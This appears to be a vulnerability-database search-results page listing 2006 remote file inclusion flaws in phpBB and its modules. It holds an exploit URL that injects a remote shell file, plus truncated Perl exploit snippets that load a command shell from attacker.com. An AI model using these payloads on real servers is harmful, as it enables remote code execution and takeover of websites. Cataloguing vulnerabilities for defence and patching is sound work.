2176 matches found
CVE-2006-5418
The CVE-2006-5418 issue affects the pbpbb archive for search engines (aka phpBBSEI) in the archive/archive_topic.php file. It is a remote file inclusion vulnerability that allows an attacker to execute arbitrary PHP code by supplying a URL to the phpbb_root_path parameter. Context from the provid...
CVE-2006-5415
PHP remote file inclusion vulnerability in includes/functionsnewshr.php in the News Defilante Horizontale 4.1.1 and earlier module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
CVE-2006-5418
PHP remote file inclusion vulnerability in archive/archivetopic.php in pbpbb archive for search engines SearchIndexer aka phpBBSEI for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
PT-2006-6154 · Phpbb · Phpbb
Name of the Vulnerable Software and Affected Versions: phpBB versions 2.0.10 and earlier Description: A remote file inclusion issue allows attackers to execute arbitrary PHP code. This is achieved by providing a URL in the phpbb root path parameter. Recommendations: For versions 2.0.10 and earlie...
PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability
PhpBB=2.0.10 groupcp.php Remote File Include Vulnerability Source Code: http://www.comscripts.com/jump.php?action=script&id=666 Vulnerable Code: include$phpbbrootpath . 'includes/pageheader.'.$phpEx; ; Exploit : http://www.vicTim.com/PhpBB/groupcp.php?phpbbrootpath=shell.txt? Discoverd By :...
CVE-2006-5387
PHP remote file inclusion vulnerability in mods/iai/includes/constants.php in the PlusXL 20272 and earlier phpBB module allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
CVE-2006-5385
PHP remote file inclusion vulnerability in admin/adminspam.php in the SpamOborona 1.0b and earlier phpBB module allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
CVE-2006-5390
PHP remote file inclusion vulnerability in includes/functionsmoduser.php in the ACP User Registration MMW 1.00 module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
CVE-2006-5385
PHP remote file inclusion vulnerability in admin/adminspam.php in the SpamOborona 1.0b and earlier phpBB module allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
CVE-2006-5390
CVE-2006-5390 describes a PHP remote file inclusion vulnerability in the ACP User Registration (MMW) 1.00 module for phpBB. The flaw arises from insufficient sanitization of the phpbb_root_path parameter in includes/functions_mod_user.php, allowing an attacker to supply a URL and execute arbitrar...
CVE-2006-5387
The CVE-2006-5387 entry describes a PHP remote file inclusion flaw in the PlusXL 20_272 and earlier phpBB module, specifically in mods/iai/includes/constants.php, allowing an attacker to execute arbitrary PHP code by supplying a URL to the phpbb_root_path parameter. The vulnerability relies on a ...
CVE-2006-5385
The CVE-2006-5385 entry documents a PHP remote file inclusion vulnerability in the SpamOborona 1.0b (older) phpBB module, specifically in admin/admin_spam.php. The root cause is that the phpbb_root_path parameter can be supplied via a URL, allowing an attacker to load and execute arbitrary PHP co...
phpbbarchive-rfi.txt
!/usr/bin/perl pbpbb archive for search engines Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://mambopower.net/ http://www.mambopower.net/downloads/phpbbsearchindexer.zip use IO::Socket; use LWP::Simple;...
phpbbsecurity-rfi.txt
!/usr/bin/perl phpBB Security 1.0.1 Class: Remote File Include Vulnerability Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbb-amod.com/downloads/phpBBSecurity.zip use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END" $socket =...
amazonia-rfi.txt
!/usr/bin/perl AMAZONIA MOD for phpbb forums Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.superphotos.info/AmazoniaMod.htm use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END"...
phpbbplusxl-rfi.txt
!/usr/bin/perl phpBB PlusXL 2.X biuld 272 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.xs4all.nl/hkicken/plusxl.htm use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END" $socke...
phpbbaddname-rfi.txt
!/usr/bin/perl phpBB Add Name Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://web.dhjh.tcc.edu.tw/gzqbyr/phpdocs/phpBB/addname.zip/ use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "EN...
mauinfo-rfi.txt
!/usr/bin/perl maluinfo 206.2.38 brazilian PHPBB Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://codigolivre.org.br/frs/download.php/1534/maluinfo-206.2.38releasenewinstall.zip use IO::Socket; use LWP::Simple;...
phpbbrpg-rfi.txt
!/usr/bin/perl PHPBB RPG Events 1.0.0 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://mods.best-dev.com/old/files/rpgevents-part2.zip use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd !...
phpbblat2cyr-rfi.txt
!/usr/bin/perl phpBB lat2cyr 1.0.1 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbbhacks.com/download/4808 use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END" $socket =...